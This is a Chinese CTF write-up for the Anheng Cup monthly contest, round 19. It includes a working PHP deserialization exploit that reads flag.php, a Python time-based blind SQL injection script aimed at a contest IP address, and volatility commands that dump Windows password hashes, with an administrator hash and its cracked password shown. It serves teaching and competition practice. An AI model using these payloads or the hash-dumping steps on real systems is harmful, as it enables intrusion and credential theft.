
安恒杯月赛19新年场WriteUp


安恒杯月赛19新年场WriteUp

Web

WEB1

题目代码

<?php
// Challenge source as quoted in the writeup (a CTF target; the bugs below are the puzzle).
// error_reporting(1) is E_ERROR only: the notices this code triggers (undefined variable,
// undefined property) are never shown, and the leading @ silences the call itself.
@error_reporting(1);
// flag.php is the file the challenge wants read; its contents are not shown on the page.
include 'flag.php';
class baby
{
    // Not settable by property access from outside, but serialized input can still carry
    // any value for it: unserialize() restores properties without running __construct().
    protected $skyobj;
    public $aaa;
    public $bbb;

    // Runs only for objects created with `new`, so `new sec` is not a guarantee for objects
    // that arrive through unserialize().
    function __construct()
    {
        $this->skyobj = new sec;
    }

    // Invoked when the object is echoed (see `echo $Input_data` at the bottom of the file).
    // Delegates to read() on whatever object skyobj holds; when skyobj is unset it falls
    // through without returning a string.
    function __toString()
    {
        if (isset($this->skyobj))
            return $this->skyobj->read();
    }
}

class cool
{
    public $filename;
    public $nice;
    public $amzing;

    // Reached through baby::__toString() when a cool instance sits in baby::$skyobj.
    function read()
    {
        // Second unserialize(), now on an object property, so this data is again
        // supplied by whoever built the serialized input.
        $this->nice = unserialize($this->amzing);
        // $sth is never defined in this file: aaa becomes null (the notice is hidden
        // by error_reporting(1)).
        $this->nice->aaa = $sth;
        // Strict comparison; it passes whenever bbb on the restored object is also
        // null or undefined.
        if($this->nice->aaa === $this->nice->bbb)
        {
            // filename is used verbatim; the "./" prefix is not a directory restriction.
            $file = "./{$this->filename}";
            // The file is read twice: once for the truthiness check, once for the return.
            if (file_get_contents($file))
            {
                return file_get_contents($file);
            }
            else
            {
                return "you must be joking!";
            }
        }
    }
}

// Benign default for baby::$skyobj: read() returns a fixed string.
class sec
{
    function read()
    {
        return "it's so sec~~";
    }
}

// Entry point: deserializes the raw `data` query parameter.
// SECURITY: unserialize() on request input lets the client pick which of the classes
// above get instantiated and what their properties hold; with these classes that is the
// challenge's intended bug (see the key-points section of the writeup). Echoing the
// result is what triggers __toString() on the restored object.
if (isset($_GET['data']))
{
    $Input_data = unserialize($_GET['data']);
    echo $Input_data;
}
else
{
    // No parameter given: display the source instead.
    highlight_file("./index.php");
}
?>

考点

考点一:echo 会触发 __toString() 魔术方法,可以借此返回 flag.php 的内容

考点二:让 $this->nice 是一个非 baby 的类(此时 $sth 未定义,aaa 与 bbb 都是 null),就能绕过 $sth 的比较

考点三:unserialize() 不会执行 __construct(),protected 变量 skyobj 本来外部不可控,但生成序列化数据时可以在 __construct() 内部给它赋值来控制

EXP

// Payload generator (run locally): a stand-in baby whose constructor fills skyobj with the
// cool/sec chain instead of the challenge's `new sec`. Only the serialized property values
// matter; the server restores them without calling this constructor.
class baby
{
    protected $skyobj;
    function __construct()
    {
        $this->skyobj = new cool;
        // Nested serialized object for cool::read() to unserialize; sec has no aaa/bbb.
        $this->skyobj->amzing = serialize(new sec);
        $this->skyobj->filename = "flag.php";
    }

}

// Only the class name is serialized; the method body is irrelevant here.
class sec
{
    function read(){}
}

// Same property layout as the challenge's cool; no methods are needed for serialization.
class cool
{
    public $filename;
    public $nice;
    public $amzing;
}


// Serialize and URL-encode the object (protected property names contain NUL bytes, so the
// raw string is not safe in a query string) for use as the `data` parameter.
$test = new baby();
echo urlencode(serialize($test));

WEB2

约束攻击登录 admin

登录后盲注

EXP

#!/usr/bin/env python
# encoding: utf-8

import requests
import time


def login(payload):
    """Send one probe and report whether the server stalled.

    `payload` is spliced verbatim into the `search[table]` parameter; the
    request is timed and a round trip above 2.5 s is taken to mean the
    conditional sleep fired. Host and PHPSESSID are the values used during
    the contest (Python 2 script).

    From the server side every probe is a request whose `search[table]`
    value carries comment-obfuscated SQL (`/**/`) and a `sleep()` call, and
    the matching ones take ~3 s to serve -- both are worth alerting on.
    """
    url = "http://106.12.21.77/Admin/User/Index?search[table]=flag/**/where/**/1/**/and/**/%s" % (payload)
    # print "[+] %s" % (url)
    before_time = time.time()
    cookies = {'PHPSESSID': '3kus5jrhoqav8te0kf74hglii7'}
    response = requests.get(url, cookies=cookies)
    # content = response.content
    after_time = time.time()
    # Wall-clock round-trip time of the request.
    offset = after_time - before_time
    # print "[*] Offset : %f" % (offset)
    if offset > 2.5:
        return True
    else:
        return False

def main():
    """Recover the flag one character at a time from response timing.

    For positions 1..39 and each candidate in `charaters`, the probe makes
    the database sleep(3) when mid(flag, i, 1) equals the candidate; the
    first candidate for which login() reports a stall is appended and the
    next position starts. A position where nothing matches is silently
    skipped, so the loop runs all 39 positions regardless of flag length.
    """
    data = ""
    charaters = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
    for i in range(1, 40, 1):
        for j in charaters:
            # "%%23" survives the % formatting as the literal "%23" (URL-encoded '#').
            payload = "if((mid((select/**/flag/**/from/**/flag),%d,1))='%s',sleep(3),0)%%23" % (i, j)
            if login(payload):
                data += str(j)
                print "[+] Found : %s" % (data)
                break


# Script entry point.
if __name__ == "__main__":
    main()

MISC

隐写

binwalk -e zhu.jpg  # -e: carve out the files binwalk finds embedded in the image

Stegsolve

MISC2

内存取证

volatility一把梭

volatility imageinfo -f memory  # identify the OS / suggested profile of the memory image
volatility hashdump -f memory --profile=WinXPSP2x86  # dump the password hashes of the local accounts

得到管理员hash如下:

Administrator:500:0182bd0bd4444bf867cd839bf040d93b:c22b315c040ae6e0efee3518d830362b:::

所以c22b315c040ae6e0efee3518d830362b即为管理员密码的md5值,解出来是123456789,再md5一下就行。

相关链接

内存取证工具 volatility 使用说明:https://www.restran.net/2017/08/10/memory-forensics-tool-volatility/

CRYPTO

键盘密码

ypau -> flag
